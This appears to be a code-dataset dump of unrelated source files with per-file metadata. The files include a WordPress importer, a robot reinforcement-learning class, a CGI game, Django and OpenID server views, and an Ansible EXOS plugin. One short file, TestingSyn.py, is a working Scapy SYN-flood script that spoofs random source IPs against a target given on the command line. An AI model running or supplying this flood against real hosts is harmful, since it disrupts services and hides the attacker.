return wordpress_namespace, post_type, post_id, parent_id
def process_item_if_attachment(self, item):
"""Process attachments."""
wordpress_namespace, post_type, post_id, parent_id = self._extract_item_info(item)
if post_type == 'attachment':
data = self.import_attachment(item, wordpress_namespace)
# If parent was found, store relation with imported files
if parent_id is not None and int(parent_id) != 0:
self.attachments[int(parent_id)][post_id] = data
else:
LOGGER.warn("Attachment #{0} ({1}) has no parent!".format(post_id, data['files']))
def write_attachments_info(self, path, attachments):
"""Write attachments info file."""
with io.open(path, "wb") as file:
file.write(json.dumps(attachments).encode('utf-8'))
def process_item_if_post_or_page(self, item):
"""Process posts and pages."""
wordpress_namespace, post_type, post_id, parent_id = self._extract_item_info(item)
if post_type != 'attachment':
# Get attachments for post
attachments = self.attachments.pop(post_id, None)
# Import item
if post_type == 'post':
out_folder_slug = self.import_postpage_item(item, wordpress_namespace, 'posts', attachments)
else:
out_folder_slug = self.import_postpage_item(item, wordpress_namespace, 'stories', attachments)
# Process attachment data
if attachments is not None:
# If post was exported, store data
if out_folder_slug:
destination = os.path.join(self.output_folder, out_folder_slug[0],
out_folder_slug[1] + ".attachments.json")
self.write_attachments_info(destination, attachments)
def import_posts(self, channel):
"""Import posts into the site."""
self.attachments = defaultdict(dict)
# First process attachments
for item in channel.findall('item'):
self.process_item_if_attachment(item)
# Next process posts
for item in channel.findall('item'):
self.process_item_if_post_or_page(item)
# Assign attachments to posts
for post_id in self.attachments:
LOGGER.warn(("Found attachments for post or page #{0}, but didn't find post or page. " +
"(Attachments: {1})").format(post_id, [e['files'][0] for e in self.attachments[post_id].values()]))
def get_text_tag(tag, name, default):
"""Get the text of an XML tag."""
if tag is None:
return default
t = tag.find(name)
if t is not None and t.text is not None:
return t.text
else:
return default
def separate_qtranslate_content(text):
"""Parse the content of a wordpress post or page and separate qtranslate languages.
qtranslate tags: <!--:LL-->blabla<!--:-->
"""
# TODO: uniformize qtranslate tags <!--/en--> => <!--:-->
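    # Illustrative example (assumed input):
    #   separate_qtranslate_content("<!--:en-->Hello<!--:--><!--:fr-->Bonjour<!--:-->")
    #   returns {'en': 'Hello', 'fr': 'Bonjour'}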
qt_start = "<!--:"
qt_end = "-->"
qt_end_with_lang_len = 5
qt_chunks = text.split(qt_start)
content_by_lang = {}
common_txt_list = []
for c in qt_chunks:
if not c.strip():
continue
if c.startswith(qt_end):
# just after the end of a language specific section, there may
# be some piece of common text or tags, or just nothing
lang = "" # default language
            c = c[len(qt_end):]  # strip exactly one end marker; lstrip('-->') could eat real '-'/'>' characters
if not c:
continue
elif c[2:].startswith(qt_end):
            # a language specific section (with language code at the beginning)
lang = c[:2]
c = c[qt_end_with_lang_len:]
else:
# nowhere specific (maybe there is no language section in the
# currently parsed content)
lang = "" # default language
if not lang:
common_txt_list.append(c)
for l in content_by_lang.keys():
content_by_lang[l].append(c)
else:
content_by_lang[lang] = content_by_lang.get(lang, common_txt_list) + [c]
# in case there was no language specific section, just add the text
if common_txt_list and not content_by_lang:
content_by_lang[""] = common_txt_list
# Format back the list to simple text
for l in content_by_lang.keys():
content_by_lang[l] = " ".join(content_by_lang[l])
return content_by_lang
| mit | 5,451,225,839,017,826,000 | 43.760611 | 245 | 0.54728 | false |
jpedrorl/Robotics-AI | final/robbie.py | 1 | 10715 | import copy
import math
from time import time
# remote API script
REMOTE_API_OBJ = 'RemoteAPI'
REMOTE_API_FUNC = 'resetSimulation'
# robot constants
STUCK_MARGIN = 1e-2
STUCK_TIMEOUT = 10
FALL_HEIGHT = 7e-2
# robot joints names
TAIL_JOINT = "tailJoint"
LEG_TOP_JOINT = "robbieLegJoint1"
LEG_MIDDLE_JOINT = "robbieLegJoint2"
LEG_BOTTOM_JOINT = "robbieLegJoint3"
FOOT_TIP = "robbieFootTip"
FOOT_TARGET = "robbieFootTarget"
LEG_JOINT_SUFFIX = ["", "#0", "#1", "#2"]
# reward values
FORWARD_REWARD = 100 # reward for getting far
CONTINUOUS_REWARD = 0 # reward for having same speed as last frame
BACKWARDS_PENALTY = -100 # penalty for going backwards
ROTATION_PENALTY = -.25 # penalty for getting off track
STUCK_PENALTY = -10 # penalty for getting stuck
FALL_PENALTY = -20 # penalty for falling down
STOP_PENALTY = -10 # penalty for not moving
# state and action contants
STATES_DIM = 36
ACTIONS_DIM = 8
# action values
MAX_SPEED = 0.5 # max speed of feet
FRONT_MIN_LIMITS = [0, -2e-2, -1e-2] # min relative position of front feet
FRONT_MAX_LIMITS = [0, 2e-2, 2e-2] # max relative position of front feet
BACK_MIN_LIMITS = [0, -2e-2, -1e-2] # min relative position of back feet
BACK_MAX_LIMITS = [0, 2e-2, 2e-2] # max relative position of back feet
class Robbie(object):
def __init__(self, sim, name):
self.sim = sim # simulation environment
self.name = name # robot's name
self.handle = self.sim.get_handle(name) # robot's id handle
# last tick time
self.last_tick = time()
# id handles
self.foot_tips = []
self.foot_targets = []
self.robot_joints = []
# get handles of leg joints and foot summies
for suffix in LEG_JOINT_SUFFIX:
self.foot_tips += [self.sim.get_handle(FOOT_TIP + suffix)]
self.foot_targets += [self.sim.get_handle(FOOT_TARGET + suffix)]
self.robot_joints += [self.sim.get_handle(LEG_TOP_JOINT + suffix),
self.sim.get_handle(LEG_MIDDLE_JOINT + suffix),
self.sim.get_handle(LEG_BOTTOM_JOINT + suffix)]
# get handle for tail joint
self.robot_joints += [self.sim.get_handle(TAIL_JOINT)]
# declare pose, position and speed variables
self.position = [0] * 3
self.orientation = [0] * 3
self.tips_position = [0] * len(self.foot_tips)
self.tips_speed = [0] * (2 * len(self.foot_tips))
self.joints_position = [0] * len(self.foot_targets)
# relative positions
self.tips_rel_position = [0] * len(self.foot_tips)
self.init_rel_position = [0] * len(self.tips_rel_position)
self.max_positions = [0] * len(self.tips_rel_position)
self.min_positions = [0] * len(self.tips_rel_position)
# last frame variables
self.last_position = [0] * 3
self.last_orientation = [0] * 3
self.last_speed = [0] * len(self.tips_speed)
# stuck and fallen check variables
self.is_stuck = False
self.has_stopped = False
self.stuck_position = [0] * 3
self.stuck_time = 0
self.has_fallen = False
# initial update
self.pre_update()
## reset robot on the scene
def reset_robot(self):
# reset server through script
self.sim.execute_script(REMOTE_API_OBJ, REMOTE_API_FUNC)
self.sim.disconnect()
self.sim.connect()
# reset variables
self.last_speed = [0] * len(self.tips_speed)
self.is_stuck = False
self.has_stopped = False
self.stuck_position = [0] * 3
self.stuck_time = 0
# initial update
self.pre_update()
# first update to be run
def pre_update(self):
self.sim.update()
self.update_pose(True)
self.update_sensors(True)
self.sim.update()
self.update_pose(False)
self.update_sensors(False)
self.calculate_limits()
## main update
def update(self):
# get tick delta time
now_tick = time()
tick_time = now_tick - self.last_tick
self.last_tick = now_tick
# update robot feet position
self.move_feet(tick_time)
# update simulator after rotations
self.sim.update()
self.update_pose(False)
self.update_sensors(False)
self.check_stuck(tick_time)
self.check_fallen()
## update pose
def update_pose(self, first_time):
self.last_position = copy.copy(self.position)
self.last_orientation = copy.copy(self.orientation)
self.position = self.sim.get_position(self.handle, first_time)
self.orientation = self.sim.get_orientation(self.handle, first_time)
## update sensors
def update_sensors(self, first_time):
self.joints_position = [self.sim.get_joint_position(i, first_time) for i in self.robot_joints]
self.tips_position = [self.sim.get_position(i, first_time) for i in self.foot_tips]
self.tips_rel_position = [self.sim.get_position(i, first_time, True) for i in self.foot_targets]
## move robot feet targets
def move_feet(self, tick_time):
for i, foot_target in enumerate(self.foot_targets):
index = i * 2
tick_move = MAX_SPEED * tick_time
# calculate wanted values
target_delta = [0] * 3
target_delta[0] = 0
target_delta[1] = self.tips_speed[index] * tick_move
target_delta[2] = self.tips_speed[index + 1] * tick_move
# clamp values
new_rel_position = [a + b for a, b in zip(self.tips_rel_position[i], target_delta)]
for j, _ in enumerate(new_rel_position):
new_rel_position[j] = min(new_rel_position[j], self.max_positions[i][j])
new_rel_position[j] = max(new_rel_position[j], self.min_positions[i][j])
self.sim.set_position(foot_target, new_rel_position, True)
## return robot current state
def get_state(self):
state = []
for tip_position in self.tips_position:
relative_position = [a - b for a, b in zip(self.position, tip_position)]
state += relative_position # 12 states (4 feet tips position 3 axis)
state += self.tips_speed # 8 states (4 feet targets speed 2 axis)
state += self.joints_position # 13 states (passive joints position)
state += self.orientation # 3 states (robot orientation 3 axis)
return state # total: 36 states
## return current state reward
def get_reward(self):
# start with neutral reward
reward = 0
# get position and orientation diff
diff_position = [a - b for a, b in zip(self.position, self.last_position)]
diff_orientation = [a - b for a, b in zip(self.orientation, self.last_orientation)]
# calculate distance
distance = math.sqrt(math.pow(diff_position[0], 2) + math.pow(diff_position[1], 2))
# calculate diff angle
diff_angle = diff_orientation[2]
if diff_angle > math.pi:
diff_angle -= 2 * math.pi
elif diff_angle < -math.pi:
diff_angle += 2 * math.pi
diff_angle_deg = abs(diff_angle) * 180 / math.pi
# calculate direction
last_angle = self.last_orientation[2]
angle_vector = [-math.sin(last_angle), math.cos(last_angle), 0]
dot_product = angle_vector[0] * diff_position[0] + angle_vector[1] * diff_position[1]
direction = math.copysign(1, dot_product)
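        # e.g. if the robot last faced along +y (last_angle == 0) then
        # angle_vector == [0, 1, 0], so moving towards +y gives a positive
        # dot product and direction == 1 (forward motion).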
# calculate if targets have same speed than last frame
same_speeds = [math.copysign(1, a) == math.copysign(1, b) for a, b in zip(self.tips_speed, self.last_speed)]
# reward for getting far or penalty for going backwards
if direction == 1:
reward += distance * FORWARD_REWARD
else:
reward += distance * BACKWARDS_PENALTY
# penalty for getting off track
reward += diff_angle_deg * ROTATION_PENALTY
# reward for having same speed as last frame
for same_speed in same_speeds:
if same_speed:
reward += CONTINUOUS_REWARD
# penalty for getting stuck
if self.is_stuck:
reward += STUCK_PENALTY
# penalty for falling down
if self.has_fallen:
reward += FALL_PENALTY
# penalty for not moving
if self.has_stopped:
reward += STOP_PENALTY
return reward
## check if robot didn't move for some time
def check_stuck(self, tick_time):
is_close = True
for i in range(3):
diff_pos = abs(self.stuck_position[i] - self.position[i])
if diff_pos >= STUCK_MARGIN:
is_close = False
break
if is_close:
self.stuck_time += tick_time
self.has_stopped = True
self.is_stuck = self.stuck_time >= STUCK_TIMEOUT
else:
self.stuck_time = 0
self.stuck_position = self.position
self.has_stopped = False
self.is_stuck = False
## check if robot has fallen
def check_fallen(self):
self.has_fallen = self.position[2] < FALL_HEIGHT
## calculate min and max position for each foot
def calculate_limits(self):
self.init_rel_position = copy.copy(self.tips_rel_position)
for i, rel_position in enumerate(self.init_rel_position):
is_front_foot = (i % 2 == 0)
max_limit = FRONT_MAX_LIMITS if is_front_foot else BACK_MAX_LIMITS
min_limit = FRONT_MIN_LIMITS if is_front_foot else BACK_MIN_LIMITS
self.max_positions[i] = [a + b for a, b in zip(rel_position, max_limit)]
self.min_positions[i] = [a + b for a, b in zip(rel_position, min_limit)]
## exectute actions on robot
def act(self, actions):
# perform actions
self.last_speed = copy.copy(self.tips_speed)
for i, action in enumerate(actions):
self.tips_speed[i] = action * MAX_SPEED
# update robot on simulator
self.update()
# check if should finish
done = self.is_stuck or self.has_fallen
# return new state
return self.get_state(), self.get_reward(), done
@staticmethod
## return states and actions dimensions
def get_dimensions():
return STATES_DIM, ACTIONS_DIM
### [debug] robot pose
def print_pose(self):
print(self.position + self.orientation)
### [debug] robot state
def print_state(self):
print(self.get_state())
| mit | 9,150,720,905,400,978,000 | 34.716667 | 116 | 0.597294 | false |
DylanSecreast/uoregon-cis-portfolio | uoregon-cis-433/Testing stuff/TestingSyn.py | 1 | 1040 | import socket
import random
import sys
import threading
from scapy.all import *
if len(sys.argv) != 3:
    print "Usage: %s <TargetIp> <Port>" % sys.argv[0]
    sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
total = 0
conf.iface = 'en1'
class syn(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # randomize the source address (valid IPv4 octets are 1-254)
        s = IP()
        s.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        s.dst = target
        # build the TCP SYN segment aimed at the target port
        t = TCP()
        t.sport = random.randint(1, 65000)
        t.dport = port
        t.flags = 'S'
        send(s/t, verbose=0)
print "Currently attempting flooding on %s:%i with SYN packets." % (target, port)
while 1:
    syn().start()
    total += 1
    sys.stdout.write("\rCurrent total packets sent: \t\t\t%i" % total)
| gpl-3.0 | -7,891,160,487,441,633,000 | 18.259259 | 126 | 0.556731 | false |
Luminous311/gtgapp | equipment/views.py | 1 | 2156 | from django.shortcuts import render_to_response
from equipment.models import *
"""def getalltypes():
e = EquipmentType.objects.select_related()
dict = {}
for i in e:
if str(i.equipment_class) in dict:
dict[str(i.equipment_class)].append(str(i))
else:
dict[str(i.equipment_class)].append(str(i))
return dict
"""
def equipmentlist(request):
return render_to_response('equipmentlist.html',
{'equipmentlist': EquipmentType.objects.all()}
)
def equipmentclass(request, equipment_class_id=1): # Where #1 is the default, not a hardcoded value
return render_to_response('equipmentclass.html',
{'equipmentclass': EquipmentClass.objects.get(id=equipment_class_id)})
"""from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template.loader import get_template
from django.template import Context
from django.views.generic.base import TemplateView
# Create your views here.
def hello(request):
name= "Aaron"
html = "<html><body>Hi %s. This seems to have worked!</html></body>" % name
return HttpResponse(html)
#This is a non class-based view, which calls a template and sets certain arguments to stated values.
def hello_template(request):
name = "Aaron"
t = get_template('hello.html')
html = t.render(Context({'name': name}))
return HttpResponse(html)
#This is a shortcut view, where you tell it the name of the template and pass it arguments. It functions the same as hello_template.
def hello_template_simple(request):
name = "Aaron"
return render_to_response('hello.html', {'name': name})
#This is a class-based view, which takes a template name, and ... I'm not totally sure why I'd use this.
class HelloTemplate(TemplateView):
template_name = 'hello_class.html'
def get_context_data(self, **kwargs):
        # super() delegates to the parent class's get_context_data implementation.
context = super(HelloTemplate, self).get_context_data(**kwargs)
context['name'] = 'Aaron'
return context"""
| mit | -1,836,965,884,439,657,000 | 34.933333 | 132 | 0.674397 | false |
trishnaguha/ansible | lib/ansible/plugins/cliconf/exos.py | 1 | 4340 | #
# (c) 2017 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from itertools import chain
from ansible.module_utils._text import to_bytes, to_text
from ansible.module_utils.network.common.utils import to_list
from ansible.plugins.cliconf import CliconfBase
class Cliconf(CliconfBase):
def get_device_info(self):
device_info = {}
device_info['network_os'] = 'exos'
reply = self.get('show switch detail')
data = to_text(reply, errors='surrogate_or_strict').strip()
match = re.search(r'ExtremeXOS version (\S+)', data)
if match:
device_info['network_os_version'] = match.group(1)
match = re.search(r'System Type: +(\S+)', data)
if match:
device_info['network_os_model'] = match.group(1)
match = re.search(r'SysName: +(\S+)', data)
if match:
device_info['network_os_hostname'] = match.group(1)
return device_info
    def get_config(self, source='running', flags=None):
        if source not in ('running', 'startup'):
            raise ValueError("fetching configuration from %s is not supported" % source)
        if source == 'running':
            cmd = 'show configuration'
        else:
            cmd = 'debug cfgmgr show configuration file'
            reply = self.get('show switch | include "Config Selected"')
            data = to_text(reply, errors='surrogate_or_strict').strip()
            match = re.search(r': +(\S+)\.cfg', data)
            if match:
                # append the selected configuration file name, e.g. 'primary.cfg'
                cmd += ' %s.cfg' % match.group(1)
        flags = [] if flags is None else flags
        if flags:
            cmd += ' ' + ' '.join(flags)
        cmd = cmd.strip()
        return self.send_command(cmd)
def edit_config(self, command):
for cmd in chain(to_list(command)):
if isinstance(cmd, dict):
command = cmd['command']
prompt = cmd['prompt']
answer = cmd['answer']
newline = cmd.get('newline', True)
else:
command = cmd
prompt = None
answer = None
newline = True
self.send_command(to_bytes(command), to_bytes(prompt), to_bytes(answer),
False, newline)
def get(self, command, prompt=None, answer=None, sendonly=False, check_all=False):
return self.send_command(command=command, prompt=prompt, answer=answer, sendonly=sendonly, check_all=check_all)
def get_device_operations(self):
return {
'supports_diff_replace': True,
'supports_commit': False,
'supports_rollback': False,
'supports_defaults': True,
'supports_onbox_diff': False,
'supports_commit_comment': False,
'supports_multiline_delimiter': False,
'supports_diff_match': True,
'supports_diff_ignore_lines': True,
'supports_generate_diff': True,
'supports_replace': True
}
def get_option_values(self):
return {
'format': ['text'],
'diff_match': ['line', 'strict', 'exact', 'none'],
'diff_replace': ['line', 'block'],
'output': ['text']
}
def get_capabilities(self):
result = {}
result['rpc'] = self.get_base_rpc()
result['network_api'] = 'cliconf'
result['device_info'] = self.get_device_info()
result['device_operations'] = self.get_device_operations()
result.update(self.get_option_values())
return json.dumps(result)
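# Illustrative (assumed) usage, not part of this plugin: Ansible instantiates
# Cliconf over a network_cli connection and callers parse the JSON it returns,
# e.g. json.loads(cliconf.get_capabilities())['device_info']['network_os'].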
| gpl-3.0 | 6,932,542,394,654,461,000 | 34.284553 | 119 | 0.587558 | false |
toddpalino/kafka-tools | kafka/tools/protocol/responses/group_coordinator_v0.py | 1 | 1090 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from kafka.tools.protocol.responses import BaseResponse
class GroupCoordinatorV0Response(BaseResponse):
schema = [
{'name': 'error', 'type': 'int16'},
{'name': 'node_id', 'type': 'int32'},
{'name': 'host', 'type': 'string'},
{'name': 'port', 'type': 'int32'},
]
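# Illustrative decoded response (assumed values):
#   {'error': 0, 'node_id': 1001, 'host': 'broker1.example.com', 'port': 9092}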
| apache-2.0 | -967,905,041,559,764,600 | 39.37037 | 62 | 0.712844 | false |
parkr/Angels-vs-Demons | activity.py | 1 | 7979 | #! /usr/bin/python
#
# Author: Parker Moore
# Class: COMP 206 - McGill University
# Winter 2011
# Assignment 5
# Team Quad-Core Programmers
#
print "Content-type: text/html\n\n"
import cgitb; cgitb.enable()
class Page:
def __init__(self):
self.template_page = "index.html.pyt"
self.inventory_file = "inventory.csv"
self.picked_up = "nothing"
self.what_i_have = "nothing"
self.dropped = "nothing"
self.loyalty = "none"
self.points = 0
self.results = {}
self.room_complete = 0
def check_for_input(self):
# Where all the good stuff happens.
import cgi
f2 = open(self.inventory_file, "r")
stuff = f2.read().strip().split(", ")
f2.close()
output = ""
form = cgi.FieldStorage()
if not form:
# No form? Make it so.
self.picked_up = "nothing"
self.what_i_have = "nothing"
self.dropped = "nothing"
self.loyalty = "none"
self.points = 0
self.room_complete = 0
elif form['action'].value == "pickup":
# You want to pick something up. Why don't I help you with that?
self.picked_up = str(form["pickup"].value)
self.what_i_have = str(form["what_i_have"].value)
# You can get points for that!
            if self.picked_up.lower() == "apple":
                added_points = 10
            else:
                added_points = 0
if self.what_i_have.find("nothing") >= 0:
self.what_i_have = self.picked_up
else:
self.what_i_have += (", "+self.picked_up)
self.dropped = "nothing"
stuff.remove(self.picked_up)
elif form['action'].value == "drop":
self.dropped = str(form["drop"].value)
self.what_i_have = str(form["what_i_have"].value)
if self.what_i_have.find("nothing") >= 0:
self.what_i_have = "nothing"
else:
if self.what_i_have.find(self.dropped) < self.what_i_have.rfind(", "):
# the element must be deleted along with the comma and space
self.what_i_have = self.what_i_have.replace(self.dropped+", ", "")
                elif self.what_i_have.find(",") == -1:
                    # the element is the only element!
                    self.what_i_have = self.what_i_have.replace(self.dropped, "")
                else:
                    # the element is last in the list
                    self.what_i_have = self.what_i_have.replace(", "+self.dropped, "")
self.picked_up = "nothing"
stuff.append(self.dropped)
elif form['action'].value == "move":
# Used to extract information from other team members
to_get = []
self.what_i_have = ""
if form.has_key('inventory1') and form['inventory1'].value != "":
to_get.append(str(form['inventory1'].value))
if form.has_key('inventory2') and form['inventory2'].value != "":
to_get.append(str(form['inventory2'].value))
if form.has_key('inventory3') and form['inventory3'].value != "":
to_get.append(str(form['inventory3'].value))
if form.has_key('inventory4') and form['inventory4'].value != "":
to_get.append(str(form['inventory4'].value))
if form.has_key('inventory5') and form['inventory5'].value != "":
to_get.append(str(form['inventory5'].value))
self.what_i_have = ', '.join(to_get)
if self.what_i_have == "":
self.what_i_have = "nothing"
self.dropped = "nothing"
self.picked_up = "nothing"
else:
# You submitted a form... but no action?
self.picked_up = "problem"
            self.dropped = "problem"
self.what_i_have = "problem"
#All pages have points. Get them.
if form.has_key('points') and form['points'].value != "":
self.points = int(form['points'].value)
# Set room_complete for Patrick's room.
if form.has_key('roomcomplete') and form['roomcomplete'].value != "":
self.room_complete = int(form['roomcomplete'].value)
# Set loyalty
if form.has_key('loyalty') and form['loyalty'].value != "":
self.loyalty = str(form['loyalty'].value)
else:
self.loyalty = "none"
# Set default readable phrase for what_i_have
if self.what_i_have == "" or self.what_i_have == " ":
self.what_i_have = "nothing"
if form.has_key('action') and form['action'].value == "pickup":
self.points += added_points # Have to do this here because only a few lines up, I set the points initially. No way around it.
# write changes to file
f2 = open(self.inventory_file, "w")
f2.write(", ".join(stuff))
f2.close()
return {'picked_up': self.picked_up, 'what_i_have': self.what_i_have, 'dropped': self.dropped, 'points': self.points, 'loyalty': self.loyalty}
def pickup_form(self):
        if self.loyalty not in ("none", ""):
output = """
<form id='pickup' method='post' action='activity.py'>
<select name='pickup'>
"""
for thing in self.stuff:
output += "<option value='"+thing+"'>"+thing.title()+"</option>\n\t\t\t\t"
output += """
</select>
<input type='hidden' name='what_i_have' value='%s'>
<input type='hidden' name='action' value='pickup'>
<input type='hidden' name='points' value='%d'>
<input type='hidden' name='loyalty' value='%s'>
<input type='hidden' name='roomcomplete' value='%d'>
<input value='Pickup' type='submit'>
</form>
""" % (self.what_i_have, self.points, self.loyalty, self.room_complete)
else:
output = ""
return output
def drop_form(self):
        if self.loyalty not in ("none", ""):
holding = self.what_i_have.split(", ")
output = """
<form id='drop' method='post' action='activity.py'>
<select name='drop'>
"""
for thing in holding:
output += "<option value='"+thing+"'>"+thing.title()+"</option>\n\t\t\t\t"
output += """
</select>
<input type='hidden' name='what_i_have' value='%s'>
<input type='hidden' name='action' value='drop'>
<input type='hidden' name='points' value='%d'>
<input type='hidden' name='loyalty' value='%s'>
<input type='hidden' name='roomcomplete' value='%d'>
<input value='Drop' type='submit'>
</form>
""" % (self.what_i_have, self.points, self.loyalty, self.room_complete)
else:
output = ""
return output
def go_form(self, text, fid, link):
holding = self.what_i_have.split(", ")
output = "<form id='%s' method='post' action='%s'>" % (fid, link)
for index in range(5):
if index >= len(holding):
output += "\n\t\t\t<input type='hidden' name = 'inventory%d' value=''>" % (index+1)
else:
thing = holding[index]
if thing == "nothing":
thing = ""
output += "\n\t\t\t<input type='hidden' name = 'inventory%d' value='%s'>" % (index+1, thing)
if self.loyalty == "none":
loyalty = ""
else:
loyalty = self.loyalty
output += """
<input type='hidden' name='points' value='%d'>
<input type='hidden' name='loyalty' value='%s'>
<input type='hidden' name='roomcomplete' value='%d'>
</form>
""" % (self.points, loyalty, self.room_complete)
return {'output': output, 'link': "<a href='#' onclick='submitForm(\"%s\")'>%s</a>" % (fid, text)}
def generate_page(self):
try:
f1 = open(self.template_page, "r")
self.results = self.check_for_input()
f2 = open(self.inventory_file, "r")
self.stuff = f2.read().strip().split(", ")
pickup_form_stuff = self.pickup_form()
drop_form_stuff = self.drop_form()
go_left_stuff = self.go_form('←Go Left', 'left', 'http://cs.mcgill.ca/~pcrane/teamPage/cgi-bin/show.py')
go_right_stuff = self.go_form('Go Right→', 'right', 'http://cs.mcgill.ca/~jmahen/cgi-bin/show.py')
if self.loyalty == "none" or self.loyalty == "":
self.loyalty = "none. <span class='error'>Move left to choose a side.</span>"
print f1.read() % (pickup_form_stuff, drop_form_stuff, self.what_i_have, self.picked_up, self.dropped, self.loyalty, self.points, go_left_stuff['link'], go_right_stuff['link'], go_left_stuff['output'], go_right_stuff['output'])
except Exception, e:
import traceback, sys
print
print '<html><head><title>'
print str(e)
print '</title>'
print '</head><body>'
print '<h1>TRACEBACK</h1>'
print '<pre>'
print str(e)
traceback.print_exc()
traceback.print_stack()
print "Unexpected error:", sys.exc_info()[0]
print '</pre>'
print '</body></html>'
p = Page()
p.generate_page()
| gpl-2.0 | 6,670,208,012,786,311,000 | 35.43379 | 230 | 0.624389 | false |
strogo/turbion | turbion/bits/openid/views/server.py | 1 | 6676 | from django import http
from django.contrib import auth
from django.views.generic.simple import direct_to_template
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import force_unicode
from django.conf import settings
from turbion.bits.profiles import get_profile
from turbion.bits.openid import forms, utils, models
from turbion.bits.utils.urls import uri_reverse
from turbion.bits.utils.decorators import templated, special_titled
from turbion.bits.utils.views import status_redirect
# Maps sreg data fields to Turbion profile attributes when the names differ
SREG_TO_PROFILE_MAP = {
'fullname': 'full_name',
}
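# e.g. the sreg field 'fullname' is read from Profile.full_name; any field not
# listed here is assumed to share the profile attribute name (see _add_sreg,
# which falls back via SREG_TO_PROFILE_MAP.get(field, field)).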
titled = special_titled(section=_("OpenID Server"))
def is_identity_profile(request):
return get_profile(request).pk == int(settings.TURBION_OPENID_IDENTITY_PROFILE)
def identity_profile_required(view):
def _decorator(request, *args, **kwargs):
if not is_identity_profile(request):
return http.HttpResponseForbidden('Access restricted')
return view(request, *args, **kwargs)
return _decorator
def is_trust(url):
try:
trust = models.Trust.objects.get(url=url)
return True
except models.Trust.DoesNotExist:
return False
def _render_response(request, openid_response, server=None):
    from openid.server.server import EncodingError
    if not server:
        server = utils.get_server()
try:
webresponse = server.encodeResponse(openid_response)
except EncodingError, why:
import cgi
return _render_error(request, cgi.escape(why.response.encodeToKVForm()))
r = http.HttpResponse(webresponse.body)
r.status_code = webresponse.code
for header, value in webresponse.headers.iteritems():
r[header] = value
return r
def _render_error(request, message):
return status_redirect(
request,
title=_('Error'),
section=_("OpenID Server"),
message=message,
next='/'
)
def endpoint(request):
from openid.server.server import ProtocolError
server = utils.get_server()
data = dict(request.REQUEST.items())
try:
openid_request = server.decodeRequest(data)
except ProtocolError, why:
return _render_error(request, force_unicode(why))
if openid_request is not None:
utils._save_request(request, openid_request)
else:
openid_request = utils._load_request(request)
if openid_request is None:
return http.HttpResponseBadRequest('OpenID consumer request required')
if openid_request.mode in ["checkid_immediate", "checkid_setup"]:
if not openid_request.idSelect():
id_url = settings.TURBION_OPENID_IDENTITY_URL
# Confirm that this server can actually vouch for that
# identifier
if id_url != openid_request.identity:
# Return an error response
why = ProtocolError(
openid_request.message,
"This server cannot verify the URL %r" %
(openid_request.identity,)
)
return _render_error(request, force_unicode(why))
# authenticate immediate if possible
if request.user.is_authenticated()\
and is_identity_profile(request)\
and is_trust(openid_request.trust_root):
openid_response = openid_request.answer(
True,
identity=settings.TURBION_OPENID_IDENTITY_URL
)
_add_sreg(openid_request, openid_response)
return _render_response(request, openid_response)
if openid_request.immediate:
openid_response = openid_request.answer(
False,
identity=settings.TURBION_OPENID_IDENTITY_URL
)
return _render_response(request, openid_response)
else:
return decide(request, openid_request)
else:
openid_response = server.handleRequest(openid_request)
return _render_response(request, openid_response, server)
@login_required
@identity_profile_required
@templated('turbion/openid/server/decide.html')
@titled(page=_("Trust decision"))
def decide(request, openid_request=None):
from openid.yadis.discover import DiscoveryFailure
from openid.fetchers import HTTPFetchingError
from openid.server.trustroot import verifyReturnTo
if not openid_request:
openid_request = utils._load_request(request)
trust_root = openid_request.trust_root
return_to = openid_request.return_to
try:
# Stringify because template's ifequal can only compare to strings.
trust_root_valid = verifyReturnTo(trust_root, return_to) \
and "Valid" or "Invalid"
except DiscoveryFailure, err:
trust_root_valid = "Discovery faild"
except HTTPFetchingError, err:
trust_root_valid = "Unreachable"
allowed = None
if request.method == "POST"\
       and 'decision' in request.POST:  # handle the case when the consumer request arrives via POST
form = forms.DecideForm(request.POST)
if form.is_valid():
decision = form.cleaned_data["decision"]
allowed = decision == "allow"
if allowed and form.cleaned_data["always"]:
trust, _ = models.Trust.objects.get_or_create(url=trust_root)
openid_response = openid_request.answer(
allowed,
identity=settings.TURBION_OPENID_IDENTITY_URL
)
if allowed:
_add_sreg(openid_request, openid_response)
return _render_response(request, openid_response)
else:
form = forms.DecideForm()
return {
'form': form,
'trust_root': trust_root,
'trust_root_valid': trust_root_valid,
}
def _add_sreg(openid_request, openid_response):
from openid.extensions import sreg
from turbion.bits.profiles.models import Profile
try:
profile = Profile.objects.get(pk=settings.TURBION_OPENID_IDENTITY_PROFILE)
except Profile.DoesNotExist:
return
sreg_data = {}
for field in sreg.data_fields.keys():
try:
value = getattr(profile, SREG_TO_PROFILE_MAP.get(field, field))
except AttributeError:
continue
if callable(value):
value = value()
sreg_data[field] = value
sreg_req = sreg.SRegRequest.fromOpenIDRequest(openid_request)
sreg_resp = sreg.SRegResponse.extractResponse(sreg_req, sreg_data)
openid_response.addExtension(sreg_resp)
| bsd-3-clause | 8,777,114,912,668,532,000 | 32.38 | 97 | 0.649641 | false |
